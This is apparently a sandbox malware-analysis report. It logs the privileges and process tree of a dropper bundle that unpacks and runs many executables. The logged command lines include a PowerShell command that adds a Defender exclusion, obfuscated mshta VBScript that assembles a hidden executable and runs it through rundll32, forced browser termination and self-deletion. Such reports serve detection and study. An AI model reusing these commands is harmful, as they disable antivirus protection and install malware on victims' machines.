Token: SeTcbPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeSecurityPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeTakeOwnershipPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeLoadDriverPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeSystemProfilePrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeSystemtimePrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeProfSingleProcessPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeIncBasePriorityPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeCreatePagefilePrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeCreatePermanentPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeBackupPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeRestorePrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeShutdownPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeDebugPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeAuditPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeSystemEnvironmentPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeChangeNotifyPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeRemoteShutdownPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeUndockPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeSyncAgentPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeEnableDelegationPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeManageVolumePrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeImpersonatePrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: SeCreateGlobalPrivilege	1264	Thu165bd34b1e1d4d81.exe
Token: 31	1264	Thu165bd34b1e1d4d81.exe
Token: 32	1264	Thu165bd34b1e1d4d81.exe
Token: 33	1264	Thu165bd34b1e1d4d81.exe
Token: 34	1264	Thu165bd34b1e1d4d81.exe
Token: 35	1264	Thu165bd34b1e1d4d81.exe
Token: SeShutdownPrivilege	1272	Process not Found
Token: SeShutdownPrivilege	1272	Process not Found
Token: SeShutdownPrivilege	1272	Process not Found
Token: SeShutdownPrivilege	1272	Process not Found
Token: SeShutdownPrivilege	1272	Process not Found
Token: SeShutdownPrivilege	1272	Process not Found
Token: SeShutdownPrivilege	1272	Process not Found
Token: SeDebugPrivilege	1012	taskkill.exe
Token: SeDebugPrivilege	348	powershell.exe
Token: SeShutdownPrivilege	1272	Process not Found
Token: SeShutdownPrivilege	1272	Process not Found
Token: SeDebugPrivilege	1412	3657890.scr
Token: SeDebugPrivilege	2252	1318712.scr
Token: SeDebugPrivilege	2852	WerFault.exe
Token: SeShutdownPrivilege	1272	Process not Found
Token: SeDebugPrivilege	2084	msiexec.exe
Token: SeShutdownPrivilege	1272	Process not Found
Token: SeDebugPrivilege	1092	5543246.scr
Token: SeDebugPrivilege	2288	regtlibv12.exe
Token: SeShutdownPrivilege	1272	Process not Found
Token: SeDebugPrivilege	2984	mscorsvw.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
1272	Process not Found
1272	Process not Found
2012	Thu16f3de88a335950bb.tmp
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1612 wrote to memory of 1248	1612	setup_x86_x64_install.exe	25
PID 1612 wrote to memory of 1248	1612	setup_x86_x64_install.exe	25
PID 1612 wrote to memory of 1248	1612	setup_x86_x64_install.exe	25
PID 1612 wrote to memory of 1248	1612	setup_x86_x64_install.exe	25
PID 1612 wrote to memory of 1248	1612	setup_x86_x64_install.exe	25
PID 1612 wrote to memory of 1248	1612	setup_x86_x64_install.exe	25
PID 1612 wrote to memory of 1248	1612	setup_x86_x64_install.exe	25
PID 1248 wrote to memory of 2028	1248	setup_installer.exe	26
PID 1248 wrote to memory of 2028	1248	setup_installer.exe	26
PID 1248 wrote to memory of 2028	1248	setup_installer.exe	26
PID 1248 wrote to memory of 2028	1248	setup_installer.exe	26
PID 1248 wrote to memory of 2028	1248	setup_installer.exe	26
PID 1248 wrote to memory of 2028	1248	setup_installer.exe	26
PID 1248 wrote to memory of 2028	1248	setup_installer.exe	26
PID 2028 wrote to memory of 620	2028	setup_install.exe	28
PID 2028 wrote to memory of 620	2028	setup_install.exe	28
PID 2028 wrote to memory of 620	2028	setup_install.exe	28
PID 2028 wrote to memory of 620	2028	setup_install.exe	28
PID 2028 wrote to memory of 620	2028	setup_install.exe	28
PID 2028 wrote to memory of 620	2028	setup_install.exe	28
PID 2028 wrote to memory of 620	2028	setup_install.exe	28
PID 2028 wrote to memory of 1740	2028	setup_install.exe	29
PID 2028 wrote to memory of 1740	2028	setup_install.exe	29
PID 2028 wrote to memory of 1740	2028	setup_install.exe	29
PID 2028 wrote to memory of 1740	2028	setup_install.exe	29
PID 2028 wrote to memory of 1740	2028	setup_install.exe	29
PID 2028 wrote to memory of 1740	2028	setup_install.exe	29
PID 2028 wrote to memory of 1740	2028	setup_install.exe	29
PID 2028 wrote to memory of 1664	2028	setup_install.exe	30
PID 2028 wrote to memory of 1664	2028	setup_install.exe	30
PID 2028 wrote to memory of 1664	2028	setup_install.exe	30
PID 2028 wrote to memory of 1664	2028	setup_install.exe	30
PID 2028 wrote to memory of 1664	2028	setup_install.exe	30
PID 2028 wrote to memory of 1664	2028	setup_install.exe	30
PID 2028 wrote to memory of 1664	2028	setup_install.exe	30
PID 2028 wrote to memory of 1628	2028	setup_install.exe	31
PID 2028 wrote to memory of 1628	2028	setup_install.exe	31
PID 2028 wrote to memory of 1628	2028	setup_install.exe	31
PID 2028 wrote to memory of 1628	2028	setup_install.exe	31
PID 2028 wrote to memory of 1628	2028	setup_install.exe	31
PID 2028 wrote to memory of 1628	2028	setup_install.exe	31
PID 2028 wrote to memory of 1628	2028	setup_install.exe	31
PID 2028 wrote to memory of 752	2028	setup_install.exe	32
PID 2028 wrote to memory of 752	2028	setup_install.exe	32
PID 2028 wrote to memory of 752	2028	setup_install.exe	32
PID 2028 wrote to memory of 752	2028	setup_install.exe	32
PID 2028 wrote to memory of 752	2028	setup_install.exe	32
PID 2028 wrote to memory of 752	2028	setup_install.exe	32
PID 2028 wrote to memory of 752	2028	setup_install.exe	32
PID 2028 wrote to memory of 476	2028	setup_install.exe	34
PID 2028 wrote to memory of 476	2028	setup_install.exe	34
PID 2028 wrote to memory of 476	2028	setup_install.exe	34
PID 2028 wrote to memory of 476	2028	setup_install.exe	34
PID 2028 wrote to memory of 476	2028	setup_install.exe	34
PID 2028 wrote to memory of 476	2028	setup_install.exe	34
PID 2028 wrote to memory of 476	2028	setup_install.exe	34
PID 1740 wrote to memory of 772	1740	cmd.exe	33
PID 1740 wrote to memory of 772	1740	cmd.exe	33
PID 1740 wrote to memory of 772	1740	cmd.exe	33
PID 1740 wrote to memory of 772	1740	cmd.exe	33
PID 1740 wrote to memory of 772	1740	cmd.exe	33
PID 1740 wrote to memory of 772	1740	cmd.exe	33
PID 1740 wrote to memory of 772	1740	cmd.exe	33
PID 1628 wrote to memory of 1028	1628	cmd.exe	35

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1612
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1248
- - C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:620
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1740
    - - C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu166f9a8bbe80.exe
        
        Thu166f9a8bbe80.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        
        PID:772
      - C:\Users\Admin\Pictures\Adobe Films\RW3NYYyEIt6Q5Ad3_FiILii1.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\RW3NYYyEIt6Q5Ad3_FiILii1.exe"
        6⤵
        Executes dropped EXE
        
        PID:2604
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 772 -s 1480
        6⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:2852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone
      4⤵
      Loads dropped DLL
      PID:1664
    - - C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu16205451b994.exe
        
        Thu16205451b994.exe /mixone
        5⤵
        
        PID:1012
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Thu16205451b994.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu16205451b994.exe" & exit
        6⤵
        
        PID:1352
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Thu16205451b994.exe" /f
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1012
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu161580bf75.exe
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1628
    - - C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu161580bf75.exe
        
        Thu161580bf75.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:1028
      - C:\Users\Admin\AppData\Roaming\3657890.scr
        
        "C:\Users\Admin\AppData\Roaming\3657890.scr" /S
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1412
      - C:\Users\Admin\AppData\Roaming\7655513.scr
        
        "C:\Users\Admin\AppData\Roaming\7655513.scr" /S
        6⤵
        
        PID:1720
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:2392
      - C:\Users\Admin\AppData\Roaming\5543246.scr
        
        "C:\Users\Admin\AppData\Roaming\5543246.scr" /S
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Loads dropped DLL
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        
        PID:1092
      - C:\Users\Admin\AppData\Roaming\7191671.scr
        
        "C:\Users\Admin\AppData\Roaming\7191671.scr" /S
        6⤵
        
        PID:2084
      - C:\Users\Admin\AppData\Roaming\3125632.scr
        
        "C:\Users\Admin\AppData\Roaming\3125632.scr" /S
        6⤵
        
        PID:2136
        
        C:\Users\Admin\AppData\Roaming\3125632.scr
        
        "C:\Users\Admin\AppData\Roaming\3125632.scr"
        7⤵
        
        PID:2556
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 528
        8⤵
        Program crash
        
        PID:3040
      - C:\Users\Admin\AppData\Roaming\1318712.scr
        
        "C:\Users\Admin\AppData\Roaming\1318712.scr" /S
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2252
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe
      4⤵
      PID:752
    - - C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu1628aafb3efd7c3d.exe
        
        Thu1628aafb3efd7c3d.exe
        5⤵
        Executes dropped EXE
        
        PID:2684
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 976
        6⤵
        Program crash
        
        PID:476
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe
      4⤵
      Loads dropped DLL
      PID:476
    - - C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu165bd34b1e1d4d81.exe
        
        Thu165bd34b1e1d4d81.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:1264
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:2948
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:2984
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe
      4⤵
      PID:1092
    - - C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu16466b26f8b7.exe
        
        Thu16466b26f8b7.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe
      4⤵
      Loads dropped DLL
      PID:1748
    - - C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu16f584bd3686.exe
        
        Thu16f584bd3686.exe
        5⤵
        Executes dropped EXE
        
        PID:908
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe
      4⤵
      PID:1044
    - - C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu16f3de88a335950bb.exe
        
        Thu16f3de88a335950bb.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1512
      - C:\Users\Admin\AppData\Local\Temp\is-A48CG.tmp\Thu16f3de88a335950bb.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-A48CG.tmp\Thu16f3de88a335950bb.tmp" /SL5="$4012C,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu16f3de88a335950bb.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1476
        
        C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu16f3de88a335950bb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu16f3de88a335950bb.exe" /SILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2016
        
        C:\Users\Admin\AppData\Local\Temp\is-DU4LV.tmp\Thu16f3de88a335950bb.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DU4LV.tmp\Thu16f3de88a335950bb.tmp" /SL5="$6001C,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu16f3de88a335950bb.exe" /SILENT
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\is-8524N.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8524N.tmp\postback.exe" ss1
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1120
        
        C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
        
        "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1084
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh
        10⤵
        
        PID:2444
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2444 CREDAT:275457 /prefetch:2
        11⤵
        
        PID:1832
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2444 CREDAT:275477 /prefetch:2
        11⤵
        
        PID:2552
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2444 CREDAT:209954 /prefetch:2
        11⤵
        
        PID:1336
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2444 CREDAT:275502 /prefetch:2
        11⤵
        
        PID:1924
        
        C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
        
        "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1088
        
        C:\9af3deded482a1f033daa6\Setup.exe
        
        C:\9af3deded482a1f033daa6\\Setup.exe /q /norestart /x86 /x64 /web
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1340
        
        C:\9af3deded482a1f033daa6\SetupUtility.exe
        
        SetupUtility.exe /screboot
        11⤵
        
        PID:1936
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu164ba03be19.exe
      4⤵
      Loads dropped DLL
      PID:884
    - - C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu164ba03be19.exe
        
        Thu164ba03be19.exe
        5⤵
        Executes dropped EXE
        
        PID:544
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe
      4⤵
      PID:628
    - - C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu1653d94a8da.exe
        
        Thu1653d94a8da.exe
        5⤵
        Executes dropped EXE
        
        PID:2704
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu1653d94a8da.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
        6⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu1653d94a8da.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu1653d94a8da.exe") do taskkill /F -Im "%~NxU"
        7⤵
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\09xU.exE
        
        09xU.EXE -pPtzyIkqLZoCarb5ew
        8⤵
        Executes dropped EXE
        
        PID:2536
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
        9⤵
        Modifies Internet Explorer settings
        
        PID:1968
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
        10⤵
        
        PID:2864
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
        9⤵
        
        PID:1164
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
        10⤵
        
        PID:756
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" eCHO "
        11⤵
        
        PID:2636
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
        11⤵
        
        PID:3012
        
        C:\Windows\SysWOW64\control.exe
        
        control .\R6f7sE.I
        11⤵
        
        PID:2588
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
        12⤵
        
        PID:1708
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
        13⤵
        
        PID:1136
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
        14⤵
        
        PID:3000
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F -Im "Thu1653d94a8da.exe"
        8⤵
        Kills process with taskkill
        
        PID:2288
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe
      4⤵
      Loads dropped DLL
      PID:1604
    - - C:\Users\Admin\AppData\Local\Temp\7zS0E4C5444\Thu167d514d2a7ac5a.exe
        
        Thu167d514d2a7ac5a.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:1704

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1245403086-1608202634-239250786195591238211642958411731206869-464495435199097998"
1⤵
- Loads dropped DLL
PID:1044

C:\Windows\system32\taskeng.exe
taskeng.exe {FE692551-7EA7-41E5-915B-857D6EB34C45} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
1⤵
PID:2268
- C:\Users\Admin\AppData\Roaming\rheirws
  C:\Users\Admin\AppData\Roaming\rheirws
  2⤵
  PID:1760

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2084
- C:\Windows\system32\MsiExec.exe
  C:\Windows\system32\MsiExec.exe -Embedding A5DB42A031A385A1E9B2226315ADA7DC
  2⤵
  PID:1676
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\netmemorycache.ini"
    3⤵
    PID:1696
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe" -iru
    3⤵
    PID:2440
  - - C:\Windows\system32\wbem\mofcomp.exe
      mofcomp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet.mof
      4⤵
      PID:2360
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelPerformanceCounters.man"
    3⤵
    PID:1392
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WorkflowServiceHostPerformanceCounters.man"
    3⤵
    PID:2148
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_SMSvcHostPerfCounters.ini"
    3⤵
    PID:972
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_TransactionBridgePerfCounters.ini"
    3⤵
    PID:316
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\PerfCounters.ini"
    3⤵
    PID:2648
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_Networkingperfcounters.ini
    3⤵
    PID:2992
- - C:\Windows\system32\lodctr.exe
    "C:\Windows\system32\lodctr.exe" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_DataOracleClientPerfCounters_shared12_neutral.ini
    3⤵
    PID:2052
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe update /queue
    3⤵
    PID:972
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems 1
    3⤵
    PID:2164
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 130 -InterruptEvent 0 -NGENProcess ec -Pipe f4 -Comment "NGen Worker Process"
      4⤵
      PID:2864
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 19c -InterruptEvent 0 -NGENProcess 17c -Pipe 194 -Comment "NGen Worker Process"
      4⤵
      PID:1588
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 174 -InterruptEvent 0 -NGENProcess f0 -Pipe 188 -Comment "NGen Worker Process"
      4⤵
      PID:1568
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 174 -InterruptEvent 0 -NGENProcess 130 -Pipe 1a4 -Comment "NGen Worker Process"
      4⤵
      PID:2256
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1d0 -InterruptEvent 0 -NGENProcess 1d4 -Pipe 1c8 -Comment "NGen Worker Process"
      4⤵
      PID:2148
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1cc -InterruptEvent 0 -NGENProcess 130 -Pipe 1e4 -Comment "NGen Worker Process"
      4⤵
      PID:1000
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1b0 -InterruptEvent 0 -NGENProcess 1bc -Pipe 1dc -Comment "NGen Worker Process"
      4⤵
      PID:740
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1f4 -InterruptEvent 0 -NGENProcess 130 -Pipe 198 -Comment "NGen Worker Process"
      4⤵
      PID:2032
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1b0 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1f8 -Comment "NGen Worker Process"
      4⤵
      PID:2360
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
